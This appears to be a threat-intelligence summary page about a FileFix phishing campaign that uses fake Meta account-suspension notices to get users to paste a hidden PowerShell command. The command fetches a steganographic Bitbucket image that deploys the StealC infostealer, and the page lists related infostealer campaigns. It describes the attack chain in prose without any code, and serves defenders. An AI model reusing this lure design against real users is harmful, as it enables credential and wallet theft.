FileFix Meta account-suspension phishing campaign
Campaign
Summary
Hide ▲
Show ▼
FileFix attackers are using a Meta account suspension lure to trick users into running disguised commands that install StealC infostealer. The phishing flow hides a PowerShell command behind a fake file path in the File Explorer address bar, then uses a JPG hosted on Bitbucket and steganography to unpack the payload. The operation was seen in multiple variants over two weeks, showing active iteration across payloads, domains, and lures. It matters because the malware can steal browser logins, cloud credentials, wallets, and other sensitive data from infected devices.
Related Happenings
Formbook phishing campaign using DLL sideloading and obfuscated JavaScript
Campaign
First: 20.04.2026 18:01
Last: 20.04.2026 18:01
Sources 1
About this happening:
The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...
Formbook phishing campaign using DLL sideloading and obfuscated JavaScript
CampaignAbout this happening: The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware ActivityAbout this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Torg Grabber browser-extension theft activity
Malware Activity
First: 25.03.2026 20:32
Last: 25.03.2026 20:32
Sources 1
About this happening:
The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...
Torg Grabber browser-extension theft activity
Malware ActivityAbout this happening: The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...
Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims
Campaign
First: 11.03.2026 16:45
Last: 11.03.2026 16:45
Sources 1
About this happening:
A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...
Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims
CampaignAbout this happening: A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...
CRESCENTHARVEST Windows RAT and info-stealer activity
Malware Activity
First: 19.02.2026 10:13
Last: 19.02.2026 10:13
Sources 1
About this happening:
The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...
CRESCENTHARVEST Windows RAT and info-stealer activity
Malware ActivityAbout this happening: The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...
Timeline
-
16.09.2025 15:00 2 articles · 8mo ago
FileFix Meta account-suspension lure drops StealC
Technical Analysis UpdateA FileFix social-engineering campaign impersonates Meta account suspension warnings with a multilingual phishing page that tells recipients their account will be disabled in seven days unless they open a fake "incident report". The Copy button hides a PowerShell command that is pasted through the Windows File Explorer address bar, downloads a JPG hosted on Bitbucket, extracts a second-stage script with steganography, decrypts payloads in memory, and deploys StealC infostealer to steal browser credentials, messaging-app logins, cryptocurrency wallets, cloud credentials, and screenshots.
Show sources
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00